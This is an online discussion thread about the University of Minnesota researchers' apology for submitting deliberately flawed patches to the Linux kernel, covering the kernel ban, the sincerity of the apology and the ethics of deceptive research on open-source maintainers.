The latest patch adds a null check around a call to gss_release_msg. The commit message says “ The patch adds a check to avoid a potential double free.”

According to other people in the conversation, this is already taken care of by reference counting (https://lore.kernel.org/linux-nfs/20210407153458.GA28924@fie... ) and the patch apparently does nothing. The commit doesn’t reference any specific tool they’re using, or any bug they faced.

Looks innocuous, but I guess past behaviour from this group left enough of a bad taste for Greg KH to be suspicious.


A later message claims (outraged at being accused of submitting intentionally broken code to the kernel, despite having previously done exactly that) that the patch was generated by a static analysis tool. Ok, what tool? How did you run it? The message where he claims this has since been deleted (by who? Edit: probably never sent to the list, see below) but here is a message from Greg KH which quotes it:

https://lore.kernel.org/linux-nfs/YH%2FfM%2FTsbmcZzwnX@kroah...

You can see that Greg KH is skeptical that the patch was generated by a tool. It’s also unclear to me if the patch is actually harmless or not. It would be good to get some definitive clarity on that but the lkml discussion of it seems inconclusive.

I would add that the student’s tone in this message feels really familiar as an open source maintainer: this is the tone of someone doing something they know is bad being called out on it and trying to deflect with outrage. The last time I got that tone, it was someone who had created multiple sock puppet accounts to try to discredit my project and force moderators to reverse or apologize for a (completely justified and mild) moderation action. So I can’t help but feel that something fishy is going on here and the UMN research group still isn’t being honest about it.


My understanding is that the "not found" messages were never archived, rather than deleted. Likely they were not CC'd to the list, and the replies added the list back to CC.


Cf https://lore.kernel.org/linux-nfs/YIUMYYcf%2FVW4a28k@kroah.c...

Apparently, they sent html mails, which the list refuses to deliver.


Thanks for explaining that!


My experience of GKH's work isn't generally very favourable; but my estination of him has been increased by this repair. He's created work for himself, but it needed doing. Credit where it's due.


> Looks innocuous, but I guess past behaviour from this group left enough of a bad taste for Greg KH to be suspicious.

The idea of the kind of research they previously did is to submit patch requests with some kind of trick or hidden agenda first, then do some analysis of the results, and then later on publish a paper explaining what they did.

Now here they are again submitting a weird looking and seemingly poorly conceived patch. Who knows what they're really doing? Perhaps they're working on some kind of new paper, with who know what purpose. Maybe they'd find out in 6 months. Maybe it's a failed line of research similar to the previous ones which they won't actually publish. Or maybe they just have no idea what they're doing. Either way, it seems like a waste of time at best. The mass ban and revert sounds like an appropriate move.


I'd like to give them the benefit of the doubt, but this is written like an apology they know they must write. It does not come across as apologetic. It comes across as rationalization veiled as an apology, and it doesn't sit well with me.

I hope I'm just being overly sensitive here.


Indeed. This letter is an attempt to justify and rationalise their actions. Essentially, it amounts to saying "we're sorry you were offended and felt hurt by our legitimate work but we had no choice but to lie to you and unethically experiment on you without your consent or we wouldn't have been able to do it". Their statement is not an actual apology, even if it is phrased in the language of apology, and it is an excellent example of what not to write if you are seeking forgiveness.

The core issue here is that the system under which they were working, and the researchers themselves, did not consider this work to amount to unethical human experimentation - even though the work directly involved infiltrating and exploiting humans and human social systems. There is no mention of this nor of any substantial desire to understand or address this systemic failing and, until there is an unconditional acceptance of responsibility for the harm caused and a real actionable change for the better with accountability, I don't see how we can consider this matter to have been apologised for.


Agreed. This is like a psychologist apologizing for traumatizing children by testing a hypothesis that telling them scary stories before bedtime would give them bad dreams. "Oh, but it's important to learn what scares kids, for the greater good" just doesn't cut it.

Software is complex. Wasting maintainer's time is harmful to the maintainers and to those who use the software. If the goal is to explain what sort of exploits to be on the look-out for, just write the paper without doing the exploits.

As for the letter, their goal is to recover their reputations, not to apologize. I suppose a lawyer helped them in spots, but there is still a certain truth that shines through: they want to continue on doing this sort of thing, because they are oh-so-clever and their work is oh-so-valuable. Nice try, but the academic community may be better off without these folks doing this sort of research and influencing students to follow their methods.


Just curious, and I'm genuinely asking as someone who thought the letter seemed well-intentioned: what should they have put in the apology letter?


> We are sorry for the harm we've caused by our unethical experimentation involving members of the Linux community. In accordance with community standards and a desire to avoid benefiting from our ethical failure, we have requested the immediate retraction of the papers and other published work resulting from this unethical experimentation. We are also working together with our institutional leadership to address the systemic and individual failings which permitted this unethical research to take place. As a result of this, we will publicly prepare a report regarding the actions taken and potential systemic changes which will ensure these actions do not reoccur and further harm is not caused. Out of an abundance of caution and because experience has shown our judgement, as is, to be questionable, no further research similar in nature to the research in question will be undertaken by this institution or these researchers until proper community consultation has taken place regarding the report and proposed changes to systemic review are implemented. Once again, we take full responsibility for any harm we have caused and we will work to ensure that such harm never occurs again. We hope that, at some point, we may regain your trust and confidence and, if you'll permit us, to work alongside you.

[signed personally, by every involved researcher, professor, IRB member, and all of the relevant university leadership including the board]

Something like that would do nicely, in my opinion. Then they'd have to absolutely follow through on it. Ideally, they'd also ask involved members of the community so harmed, among other experts, to independently review and watch the process to ensure no further harm is being done, progress is made, and public accountability is kept.


Good suggestion, especially getting the IRB involved. The board failed to recognize that the target of the research was not inanimate software but human beings.


Thank you and my point precisely. This was both an individual and systemic failure and must be treated and rectified as such with all due seriousness.


I'd consider that a pretty good apology, if that were the one they had made. I'd like to see it expressed by the university ethics board, not just by the researchers.

I wouldn't trust those researchers again, not for anything. Free software depends heavily on trust. It's astonishing that it works so well; but if you break trust, it's very hard to repair the fractures.

The legal arrangements around free software are fairly fluid, because there hasn't been much case-law, because there's not much money sloshing around for Free Software developers to pay lawyers. Banning pull-requests from that college is much cheaper than sueing.

I hope the whole uni stays banned until the ethics board issues their own apology.

Then let it go, I say. People make mistakes. We shouldn't blame everyone for the mistakes of a few.

But we have to protect the Linux kernel; billions of people depend on it's correctness.


That makes sense, thanks!


> we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

This bit just reads like "sorry you're upset".

I would have expected something along the lines of "sorry, we should have asked the maintainers and we understand why it was wrong not to", instead of "sorry, we didn't ask the maintainers, but this is why we didn't".


"It's just a prank dude!"

Legitimately these folks have some kind of personality defect. They observed something that everyone already knew and then decided to act on it and pretend they were doing something interesting and new rather than just being twats. They should be treated exactly as should be based on their actions, regardless of their claims of being researchers. This would be a perfect cover for being on the take from a government agency. They should be investigated to ensure they aren't actual malicious actors.

It takes almost no imagination to think of hundreds of "security vulnerabilities" in the world, yet the vast majority of people realize that it's dumb to act on those observations.


I am not a stakeholder in this, and my comment is about apologies, even though as a lifelong linux user and technologist responsible for deploying it, I still think there should be a real investigation.

While I had a bunch of notes about what makes the sentiment behing an apology meaningful, it's really separate from the issue that this should have been done privately. A public apology is just another thing about them and their message. They're performing and trying to draw in sympathetic members of an imaginary audience. There is no humility in public displays. I would be surprised if anybody asked for it, and doing it without asking is just more of the same type of behavior. There is no such thing as a public apology.

That said, I have no doubt they have suffered personally over this, and have some compassion for that suffering itself, but not sympathy for this performance. There is no gesture that restores trust. When their contributions and acomplishments become more remarkable than this issue, they will have restored it, but like most things, there is no "back" to go to. Maybe that static analyzer will be the ultimate bug finder, as succeeding at that is probably their only out.


It's not so much a question of what they should have put in but what they should have left out. There was an awful lot in there justifying what they did, and relatively little that acknowledged that it was wrong.


They should have addressed why the kernel maintainers felt the way they do. As it is now they are trying to rationalize their actions instead of showing they have made an attempt to understand why their research was questionable.


maybe i am being very naive here but that letter read like a sincere apology to me as well.


I think if it were a sincere apology, they would have apologized for what they did, not just that there were undesirable side effects of their research. The letter is a typical "I'm sorry you got mad" apology that people make when they're forced to, but don't think they did anything wrong.


People love to analyze apologies after the fact, but it seems totally unfair to me. Once someone has said an apology you can take the text of it and turn it into anything you want and say it proves they were lying.


An good apology needs to demonstrate an understanding of why what was done was wrong and ideally includes concrete steps that will prevent anything similar from happening again.

You seem to be implying that one apology is as good as another and that is absolutely not true. To me is is absolutely unfair to expect that people will treat a zero effort "sorry your feelings were hurt" apology the same as a deeply heartfelt apology by someone who feels deep remorse.

By it's nature, an apology should be an act of making amends to a person your have wronged. If the words of your apology don't do that, you have failed, even if you had good intentions.

If the author of the apology isn't a native speaker of english, this seems like a document of sufficient significance to merit asking a friend or colleague for a proofread. (Which you should do in a case like this even if English is your first language.)


Yep, it's called accountability. Would you prefer people acted without regard for others knowing that magic words can be spoken after the damage is done?


I would prefer you not go around saying someone is "apologizing wrong" because you've found the magic formula to turn all apology text into "I'm sorry you feel bad". There's no point in making a statement like that the original person can't respond to, anyway.


I get what you're saying and I don't want that that either. But I also don't think a simple apology that doesn't attempt to justify one's actions can be so easily flipped.


The researchers can no longer be trusted at all. The apology should have come from the University ethics board.


I agree. There are weasel-words throughout, starting with apologizing for "any harm". When you've been told what the harm was, don't apologize for "any harm" you might have caused. You should start an apology by demonstrating that you have listened and understood exactly what harm you caused.

Listing the harm you caused is also an important part of the public record, so that anyone else considering a similar scheme in the future can see what consequences were agreed to have happened the last time.


Yeah, it's not a great apology. I would say as far as justifications go, I think it's a certain level of depth expected from academics, you shouldn't overthink it.

As far as giving benefit of the doubt, it's likely not done out of malice in the first place. Just a combination of poor reasoning and doesn't exactly clear up if they even considered alternatives to control their variables. Unfortunately, it seems like they were already given the benefit of the doubt from their first offense, but did not take any lessons away from that, so it would be understandable if the maintainers kept their ban.


I don't think they had malice, but the breach of elemental ethics is just appalling. They show no remorse for being trusted and abusing that trust and good faith. They show no remorse for using human beings as involuntary guinea pigs.

In sum, they show not remorse for doing wrong.


For me, it's not learning the lesson the first time around.

I completely agree their experiment is unethical. However, it's not actually clear cut to most researchers the ethical bounds of their work, especially for study papers that's never really been explored before. Ethics in of itself is largely a active subtopic for many areas in CS, not only security research. AI is one area where qualifying potential harm to human beings remains largely controversial. Ask any ML scientist, and they'll tell you that determining the ethics of a project is not their responsibility.


I could not disagree more.

The ethics around research that involves deception have been pretty well established and are are several good comments here explaining them.

Every scientist is personally respsible for the ethics of the research they conducts. Full Stop, no caveats allowed.

If your research is in an area where the ethics are controversial or grey, that means your need to spend MORE time considering the ethics of your research, not that you get a free pass from being responsible.

If a any scientist espouses the opinion that determining the ethics of their projects is not their responsibility, they should be permanently barred from recieving grant money.


> The ethics around research that involves deception have been pretty well established and are are several good comments here explaining them.

Ethics in computing research remains an active research area. This incident will be used as a case study in the future, but it's not that well established. Many people have been using anecdotals, which honestly don't fit the scenario because so many variables and parameters distinguish other types of pentesting from this. And disappointingly, not a single post has actually produced the documents that establish this.

Arguably the first set of guidelines for ethics in computer security research [1] was published in 2012 and not yet widely taught in Ethics lectures (I only know about it because I learned Computer Security from one of the authors).

On identifying harms:

> "Challenges identifying harms in ICTR environments stem from the scale and rapidity at which risk can manifest, the difficulty of attributing research risks to specific individuals and/or organizations, and our limited understanding of the causal dynamics between the physical and virtual worlds. As with all exploratory research, it can be challenging to articulate benefits such that subjects can make informed decisions. In ICTR our ability to qualitatively and quantitatively foresee the probable benefits is particularly immature."

On this type of research:

> "Research of criminal activity often involves deception or clandestine research activity, so requests for waivers of both informed consent and post hoc notification and debriefing may be relatively common as compared with research studies of non-criminal activity."

This isn't a huge change from 30 years ago since Moor [2] wrote his thesis on Computer Ethics, see:

> "A typical problem in computer ethics arises because there is a policy vacuum about how computer technology should be used. Computers provide us with new capabilities and these in turn give us new choices for action. Often, either no policies for conduct in these situations exist or existing policies seem inadequate. A central task of computer ethics is to determine what we should do in such cases, i.e., to formulate policies to guide our actions."

Researchers themselves are far from educated on this topic; you won't ever explore this in depth unless you're in this particular sub-field. IRB/REB boards are considered the most qualified but are possibly too outdated to navigate around this. It's a whole mess, there is currently a lot of questionable research in many areas of computing, but the clock moves forward.

[1] https://www.dhs.gov/sites/default/files/publications/CSD-Men...

[2] https://web.cs.ucdavis.edu/~rogaway/classes/188/spring06/pap...


Great insight. But as for the ML scientists you mention, ethics _is_ their responsibility. We all are ethical beings.


How is malice different from a breach of elemental ethics? How is malice different from abusing trust and showing no remorse from doing wrong?

These guys are malicious clowns, who came up with an idea that would hurt Linux, but advance their careers, and they went all in on it.


I don't think you're being overly sensitive.

To me, it's always a distinct sign that an apology isn't sincere when it hedges apologizing for "any harm" that they might have caused. In my mind, a sincere apology clearly acknowledges harm that has been caused and apologizes for that.


The kernel community isn't a spurned lover or anything; the apology just has to admit fault, promise not to do that again and be truthful about it.

There is no need for the researchers to be in any specific state of mind or even apologetic as long as they don't try to submit bad faith patches again.

Really the only reason there is even a need for a public apology is to signal how much pressure they are under so other people think twice before doing the same silly thing. Otherwise they could just apologise to the maintainers directly.


I agree, but let's give them a little extra benefit of the doubt. I thought as I was reading it that it seemed stilted and forced, then I wondered if the author(s) don't speak / write English as a primary language.

I'll be interested to see how they react to feedback / responses.


> We just want you to know that we would never intentionally hurt the Linux kernel community and never introduce security vulnerabilities. Our work was conducted with the best of intentions and is all about finding and fixing security vulnerabilities.

Either this is a bald-faced lie or they didn't think through the implications of their research, neither of which bode well for their trustworthiness in future. However, if it's the latter, then they possibly deserve additional leeway.

On the other hand, I wonder whether this letter would have eventuated without the ban - if not, then they've likely been forced to write it, in which case any remorse is either selfish (i.e. they've been professionally reprimanded and feel bad about getting caught, or making such an egregious error in judgement), or hollow.

> I agree, but let's give them a little extra benefit of the doubt. I thought as I was reading it that it seemed stilted and forced, then I wondered if the author(s) don't speak / write English as a primary language.

https://www-users.cs.umn.edu/~kjlu/

It looks like you might be right about this, but I think that reading it as stilted and forced is still accurate.


The wording is definitely stilted and forced, but the content is also wrong for an apology. They spend a lot of time justifying their actions, and close with "this has been painful for us too". This may also be cultural, but it's overly self-centered for an apology.


I was just about to post: "This is a great apology."

Context is everything, of course. I think you're right that it's tainted by the fact that they absolutely did not have a choice, and coming from people who've deceived the same tribes they're now trying to apologize to.


I think they could have really helped themselves by being humble and truly apologetic. Simple things like:

- "We are sorry for the harm we caused" instead of "We're sorry for any harm we caused"

- Not trying to explain their actions in the first paragraph of the apology! I think most folks are aware of their intent by now, and leading with yet another explanation just makes the whole thing feel disingenuous

- Avoid saying things like "this has been painful for us as well"

Unfortunately, it has so many hallmarks of a non-apology, and it's hard to look past those given the context.

As others have mentioned, they can clear this up with their actions going forward, but it will take time to rebuild trust.


> hallmarks of a non-apology

Is that a thing? Like there's some non-apology Bingo card you can fill out? I don't see a connection between the criteria you listed and genuine-vs-false contrition.

You may perceive these things one way, but ultimately you can't know the minds of others well enough to tell if they are sincere or not about anything. You don't get to just declare yourself the arbiter of their feelings because they used "any" instead of "the".


There literally are bingo cards, yes!

https://www.google.com/search?q=non+apology+bingo


Thanks, I hate it :]


Does the difficulty of knowing others not put something like this in the court of opinion?

I would expect it to be there and would minimize attempts to marginalize my apology with direct, precise, and inclusive language.

For every word created or omitted to those ends, the number of negative comments will be reduced.

Fact is people take it how they take it and feel what they feel.

There really is no "can't" in any of that.

...which is why the consistent feedback to those ends is here in the discussion.

How else is this to be done and be meaningful, not easily gamed?

Serious question.


I wish I knew.

I tend to have pretty dry affect at certain hours of the day, which has caused considerable frustration for myself and others when I know I'm sincere but they don't. Nor does it make much sense to me for that sort of mind-reading to take place democratically. What do we then gain from it?

At best, you get an apology for a misunderstanding over the previous apology, plus a second draft that the masses might like better. Then you still get that lingering contingent that says "you just did that to placate people! Now we really know you don't mean it!"

The cultural apparatus for "Saving Face" is completely broken on a build failure for missing dependencies.


And what of the merits? If the previous 190 patches were indeed legitimate it strikes me as overly vengeful to pull them in a "punish the son for the sins of the father and the father for the sins of the son" kind of way.


I don't think it's particularly vengeful. I think it's a pretty natural result of the broken trust.

Yeah, the authors are claiming those past 190 patches are fine... but they also essentially did the same thing when they submitted the intentionally bad patches too.

So the question is, how much do you trust them right now? And given they just submitted intentionally bad patches, I don't think it's very surprising they don't have a whole lot of trust.

And if you don't trust them, then you've got 190 patches active from an untrusted source with a history of submitting bad patches. That's not a particularly good situation. Why wouldn't you revert them?

The specifics of the situation make the whole thing substantially murkier, in my (entirely unrelated) opinion. But take a broad enough view, and this is pretty much the default path. However the specifics make this a bit of an oddly exceptional situation, all things considered.


Or it's not in vengeance, but caution after the researchers have demonstrated that they put their needs above the community's. When the presumption of innocence is lost, it's appropriate to revert the patches until they are known to be good.

ETA: GKH on reverting the patches[1]

> This patchset has the "easy" reverts, there are 68 remaining ones that need to be manually reviewed. Some of them are not able to be reverted as they already have been reverted, or fixed up with follow-on patches as they were determined to be invalid. Proof that these submissions were almost universally wrong.

[1] https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh...


counterpoint: The LF Technical Advisory Board is taking a look at the history of UMN's contributions and their associated research projects. At present, it seems the vast majority of patches have been in good faith, but we're continuing to review the work. Several public conversations have already started around our expectations of contributors.

https://lwn.net/Articles/854064/

What the authors did is wrong, so did GKH actions. Let's be honest in calling BS out.


Agree that it could be seen as excessive, but this was not just in response to these commits, but also to the university's failure to act once they were informed of them.

They university, and indeed, the researchers, only acted once the ban was imposed - i.e. they were getting away with it without reputational damage, and only once it was stained did they actually do anything.


The patches are pulled so they can be reviewed carefully before being re-applied, not as a punishment.


Ah that makes more sense, thanks.


Why would you trust anyone who pulls this kind of stunt? IMO pulling all commits pending review and banning future commits is a reasonable precaution, particularly given this disingenuous apology and the failings of the University oversight board.


Problem is, hardly anyone is spending money on lawyers to defend Free Software. So the cheapest way to defend Free Software is to ban submissions from people who have a record of submitting crap.

Blocking an entire University seems extreme; but just think of it as a sanction on the University's ethics board. I think a (short, and very explicit) apology from the ethics board ought to suffice, to get the Uni off the hook.

And I think those researchers should not be allowed near Free Software again, unless their pushes are going to be rigourously scrutinised.


The developers likely see a systemic problem, not just this group. That very significantly expands their scope of action.


Social media insanity has greatly reduced our capacity to accept public apologies at face value. There is always a seething mob that is ready to question the sincerity of the apology once there are no more demands left to be made.


Not really.

Well constructed apologies are hard to seethe over.

This one could be better.

Many, myself included, believe it should have been.


You're not. It does not come off as apologetic at all. It is clearly someone writing as if they wanted to go back in time and act like they legitimately were caring, thoughtful people who made a mistake. In fact, they thought this was worth trying and got caught.


There's no apology they could have written that would not result in some people saying it was insincere.


As of now, it's just words on a page. Let's see how their actions back up those words.


> It does not come across as apologetic.

The words are there. It's not up to us to decide if they're "genuine". No one's a mindreader.

The tendency to view apologies as fake seems more often to reflect how harshly we view the one making it.


Their opening statement has the most classic of all non-apology tactics: "We're sorry for any harm we caused". Maybe this wasn't their intent, but this is one of the oldest "say the words without having to mean anything" tactics in the book.

It's like telling your partner "I'm sorry if I hurt you". No, you hurt them. Apologize for hurting them.


An apology should be for actions taken, not for how the other party felt about it. Acknowledging those feelings is important, but taking credit for those feelings takes agency away from the other person.


I don’t think that really makes sense. Often in a personal relationship the “action taken” will be innocuous considered in itself. But you may have done it knowing full well that it would hurt the other person’s feelings. In a case where the person’s feelings are totally irrational and you had a strong independent justification for taking the action, it does get more complicated. In general, though, I think it’s a huge mistake to assume that you should never apologize for hurting someone’s feelings.


I don't think you can take the action outside of the context in which it is performed. If you take action knowing another person is likely to feel hurt, are you... not sorry you took that action?

Regardless, you can't genuinely apologize for things that aren't in your control. (You can and should empathize and sympathize with their feelings about it.) It may be a convenient fiction at times, but there are many downsides to this type of boundary blurring. I think you do the recipient a disservice by implying they have no agency—especially if they believe you. You also face the danger that your apology seems insincere or you misjudged their feelings, which could actually make matters worse.


I don’t really buy the idea that other people’s feelings are entirely within their own control and not at all within my control.

If we really had complete agency over our feelings then I guess we’d all just choose to feel great all the time. Doesn’t seem to work that way.


Suppose my sibling and I call each other 'ugly' as a greeting and we normally enjoy this behavior. If one day I feel hurt, is my sibling responsible for that feeling? If yes, is my sibling responsible for the depth of that feeling? Even if, on this particular day, I feel more hurt by the comment because I had just broken up with a partner? Is my sibling responsible for the duration of the feeling? Even if my response to the experience is to repeat the comment over and over in my head even after my sibling apologizes? Is my sibling responsible for all the decisions in my life (including encouraging that behavior) that have lead me to be sensitive to the comment in that moment? Am I powerless to change (whether in the near term or long term) how I respond to that comment, whether through meditation, therapy, confidence training or whatever? Am I also powerless to remove my sibling from my life?

In my view, the extent to which we can influence the emotions of another is the extent to which the recipient themselves has given implicit permission to do so; which is to say, they have agency. I don't think that simplifies into being able to choose to feel great any old time we like. I also don't think it at all excuses bad behavior or justifies a lack of empathy. But I will say that I feel a lot more good moments and less frequent and intense bad moments since I adopted this view and took responsibility for my own emotions.


This highlights the importance of apologizing for the impact something has, vs. just apologizing for the act itself.

There is no universal rule that can be applied to determine when one vs. the other is appropriate, but seemingly innocuous actions can have negative impact, and apologizing for the innocuous thing may not always make sense.

To be clear, this is not universally true. There are situations where apologizing for the action makes sense, and situations where the action that led to a negative outcome are either inconsequential on their own, or there might be a myriad of factors leading to the need for an apology.

Apologizing for the action can also come across as disingenuous or passive aggressive in the wrong context. This is especially true when the action is well-intentioned, but has the wrong effect. Taken to an extreme, this sounds like "I'm sorry I tried helping".


I think your sibling should apologize for hurting your feelings by calling you ugly.


That loss is accountability in action.

Agency returns as trust does.


"We're sorry for" =/= "We're sorry if..."

The phrasing is such that it acknowledges harm was done. It's an apology, full-stop.


You don't have to be a mind reader to see that this apology isn't an apology. They spend as much time justifying their actions as they do apologizing for the unintended outcomes, and they close by complaining that they've also been hurt.


Explaining intent isn't the same as justifying. That's projection.


Apologies are really difficult to do.

You have to acknowledge (in full) what it is that you are apologising for. That's the most important thing. Promises are meaningless.

It's not possible to "be genuine"; especially in a public post, nothing is genuine, everything is PR and smoke. Both the researchers and their ethics board need to grovel. If they did that, this tornado-in-a-teacup could be over in a month or two.

But keep those researchers banned.


No one should have to "grovel" for an apology to be effective.


The ethics board were asleep on the job. Grovelling is probably less painful than falling on your sword.


They didn’t have to write it.

The first two sentences seem sincere. This reads as a real apology.


They didn't have to write it if they wanted the whole university to stay banned.


Exculpatory apology


There are some relatively minor issues with this apology that appear to already have ample discussion here, and I'll not repeat it. I want something more: I want to hear from the sponsoring faculty, research ethics board, and editors of the journal that published the article. There appear to be some systemic issues in addition to the investigators' ill-considered project. How was it that this research, which is clearly unethical, ended up being published? I've sat on an IRB: this study would not even have been a close call. Did sponsoring faculty even send it for IRB approval? Did they disclose that they were misleading their subjects? If so, did the IRB approve it? Did it make any recommendations? When submitted for publication, did they state they had IRB approval? Did they disclose that they were misleading experimental subjects? Did any reviewers express ethical concerns? Were the ethics of this study discussed by editors? Because there's either some serious systemic flaws in the review and publication process for this paper or the investigators engaged in serious misconduct. If the latter an apology (while absolutely required) is far from sufficient to address the issue. If the former, then there are several other apologies due, along with confirmation that the process will be reviewed and corrected.


Another query about IRB and human subjects: In the case of software which is not only written/maintained by a community of humans, but used by a (vast) community of humans, do the latter also become "human subjects" as well in such an experiment?


Only one of those groups is having their time and effort squandered. To me, it comes down to whether someone is being harmed. Researchers use statistics and anonymized demographic data on large populations all the time. You could argue that the population in question have become research subjects, but (1) they are not being harmed and (2) they are not being actively misled by the investigators. The moment this group started submitting patches in bad faith, they were actively misleading their subjects, and they are harming those subjects by using their time and effort without consent.


What are your thoughts about this article[0], my reading or article is that; author fails in similar way (to some extent) as researchers and there's IRB in regards to ethics of such research.

[0] https://dave-dittrich.medium.com/security-research-ethics-re...


IANAL, but the claim that this research was exempt under 45 CFR 46.104(d)(2) seems suspect to me. (i) doesn't seem to apply because Linux kernel developers are required to go by their real names for licensing reasons (cf. the rules regarding Signed-off-by). (ii) seems dubious given that the authors themselves argue that they need reviewer consent to release information about the authors' malicious patches. Note in particular that both exemption categories are concerned with what information the researchers have ("information ... recorded" in (i), "any disclosure ... would not" in (ii)), not what they publish, so the idea that they need consent to publish this information seems to imply that they needed consent to collect it.


My biggest point of confusion from article is that regulation(s) do not require explicit consent from human subjects on use of there's time, irrespective of what information is collected.


Both this guy, and the researchers themselves (in their article), suggests that the kernel adds "don't submit know-bad patches" to their code of conduct.

So it's sort of hard to take them seriously as human beings, and not just caricatures.


It's an insightful review into some of the issues and regulations around this. I'm not American, so our local rules are different, and I resigned from my institution's IRB several years ago, and these issues have become more fraught in this period. However, the way I was trained to look at these issues were around the concepts of harm, both actual and potential. In this particular case, as Dittrich notes, the questions are around the ethics of using deception in research. Deception does have a role in legitimate research. Arguably, double-blind experiments, the sine qua non of medical research have a fundamental component of deception. They also represent the most common way the ethical dilemma is resolved: subjects are told that they may be deceived, and they have an opportunity to give informed consent. That could have been done in this case: have project leads inform people working on the project that, in the interest of evaluating the patching process, patches that are incorrect or which introduce vulnerabilities may be submitted by researchers. That, of course, would require some senior members of the organization be aware the study was going on. That last is the way penetration testing and red team investigations of security resolve the ethical question---and distinguish themselves from mere vandals and criminals.

Other ways to resolve it include collecting data without deception: instead of introducing flawed or malicious patches themselves, researchers identify such patches that have historically been submitted and then review the processes that led to their acceptance or rejection. This is more difficult, but might arguably produce better results. In the case that there are few or no such cases on record, then I would question the value of doing the study at all: deceiving people to study a phenomena that doesn't appear to occur at an appreciable rate is difficult to justify.

There's a simple heuristic: if you're studying a group of human beings that you are not a member of, and for which no members are consciously participating, you must be extremely careful. The general rule in anthropological and sociological research is that you do not lie to your subjects. There are cases where the value of the research is sufficient, and for which no other options are available, to break that rule. But they are rare and the utility must be clearly shown and carefully reviewed by a qualified third party. This experiment doesn't come close.

There will certainly be those those willing to argue that this isn't human experimentation and thus does not require ethical review. If your experiment depends on misleading human beings---directly or by omission---then it requires an ethical review. It is unethical to waste people's time to no purpose. In the case of an open source project where volunteers are donating their time, it is particularly egregious: they were squandering volunteers' time. In effect they were destroying part of the contribution people made to a project they care about. That requires a very clear justification, which this particular project absolutely does not provide.

I recall a conversation with other IRB members shortly after the Sokal Hoax became known. Our general consensus was that it was hilarious but absolutely unethical if considered as an experiment.


Thank you for such detailed response.

Can there be ethical possibility (highly remote one) where an study (assuming it is objectively justified) conducted with deception, but without prior informed consent at all. (eg. human subjects will not know that there's time is used for another purpose)


Doesn't this happen all the time? Many psychology studies are done by bringing in test subjects, asking for their consent to be interviewed or tested under the guise of studying X, when in fact the researchers are looking to evaluate Y instead?

E.g. I the researcher ask if you consent to spending 30min completing a series of tasks to sort objects by their shape, presumably because I want to study your ability to recognize shapes. However, what I am actually studying is the group dynamics, of how well you and others in the group cooperate or have conflict over your tasks.


TLDR: Yes, but deceiving a subject about the details of how they are being studied is different from deceiving them about the fact that they are a research subject.

Yes, this happens all the time. But note the salient features: (1) the subjects are aware that they are research subjects and have agreed to participate (albeit without full knowledge of how the collected data will be analyzed). They have agreed to be studied, and have agreed that their time may be used in pursuit of this research. (2) All such studies undergo a very stringent ethical review and are usually monitored closely by third parties (at least since Milgram made it extremely clear that this was a necessary policy). These issues are complex and difficult to navigate---which is precisely why we have review boards. Every experiment has to be evaluated to balance the requirement to act ethically with the value of the research data to be collected. Skipping that requirement is unacceptable.

In my experience, the moment a research team starts looking for reasons not to classify what they are doing as human experimentation is the moment when it becomes extremely clear that they need board review.


Out of curiosity, study where humans are deceived about the fact that they are research subjects can be justified in general ? (to me seems like correct answer no)

Some relevant cases; the Facebook case[0] suggests it is justified because of EULA, and court determination test[1] is complicated for me to comprehend (to be honest), but seems like most relevant to this discussion.

[0] https://www.theatlantic.com/technology/archive/2014/06/every...

[1] https://casetext.com/case/sandvig-v-barr


I'm not qualified to comment on legal issues and contracts. In the case of EULAs, my understanding is that no contract where you surrender fundamental rights is valid or enforceable. But even then, I'd want a lawyers advice before assuming it. And, of course, that's a good argument for reading EULAs very carefully.

I've learned over several decades that any simple pronouncement that "X is ethical/unethical" is an effective way of ensuring that you will be wrong about some particular case. Yes, I think there might be cases where it is justified, but it would be very rare and require extremely careful monitoring and review. Two areas where it might come up would be medical research and research on children or adults of diminished capacity. In the former, there might be situations where the value of the research to the collective health and safety of the entire community would be sufficient to balance the use of such deception. In the latter, it may not be possible for your subjects to give informed consent (side note: this is, of course, also a ethical problem in experimentation on animals). The ethical dimensions of parents or guardians consenting to experimentation on their charges is extremely complex.

I will go out on a short limb and assert that ethical experimentation using that sort of deception depends a great deal on the details of a given case. Very subtle changes in the experimental protocol could easily change its ethical acceptability.

P.S: And, of course, there are a vast number of things that are completely legal but absolutely unethical.


Hopefully you see this, Department response to the Linux Foundation[0], does not matter how I look at it, it does not makes sense to, because deceit requires investigator(s) to participate in the activities being observed[1].

[0] https://drive.google.com/file/d/1z3Nm2bfR4tH1nOGBpuOmLyoJVEi...

[1] https://www.law.cornell.edu/cfr/text/45/46.104#d_2_iii


Not pictured: any attempt to argue that experimenting on the team that reviews kernel patches is a legitimate thing to do. They discuss it as if they were researching something naturally occuring, like the animals living in a tidepool.

I can imagine research on a "process" made up of humans as having some value. For example, testing EMTs on whether they correctly diagnose injuries, or testing TAs on whether they catch exam cheating. But I would expect the researchers to ask someone (in those cases, maybe the manager of the EMTs or the TAs, in this case I suppose Linus) whether this research is wanted, and for guidance on how to go about it. For example they could submit the questionable patches during slow times. Does anyone know if that happened? I assume if it had, they would've mentioned it.

With that kind of permission, I wouldn't have a problem with this research and I don't think most people here would either. Without, this is the academic equivalent of those "just a prank, bro" youtube videos.


> As many observers have pointed out to us, we made a mistake by not finding a way to consult with the community and obtain permission before running this study; we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

This shows one thing to me, clearly, they still don't understand how such studies are conducted. not authorized penetration testing is illegal, to a very large degree.

For example, as far I understand, and as many pointed out; you get permission from members for an study without specifying time or any details of a study, then conduct study in 6 month.


To summarize:

-they apologize for the three patches in 2020

-they claim asking permission would have defeated their research

-they claim the other 200 were legitimate patch attempts (a sample of which were, from my personal reading, from 'innocuous but useless' to 'slightly harmful').

Hard to believe, but plausible.


> they claim asking permission would have defeated their research

But surely this proves malice aforethought. If you interact with someone under false pretences to deliberately mislead them, then you are effectively lying to them. In fact, if you are doing so in order to receive something of value from them (such as their time reviewing your code) then it could even be seen as fraud.

Did they tell their IRB that their research involved deception? Before declaring the project exempt from oversight, the IRB should have required that the researchers answer a question like "Does your research involve interacting with people who are not aware of your project and who would act differently if they were aware?"

Until the IRB process at the university contains at least this level of protection against such ethical failings (not just in Computer Science research but across all areas of study) I think it is right for the kernel team to refuse to interact with members of that institution.


I would like see their research proposal to answer some of these questions. That probably won’t happen though.


If we don't somehow make it socially acceptable to let any security researchers conduct the required social engineering to test supply chain attack susceptibility of OSS maintainers without tipping them off in advance, dangerous state actors -will- continue to do it and -not- tell anyone when they are successful.

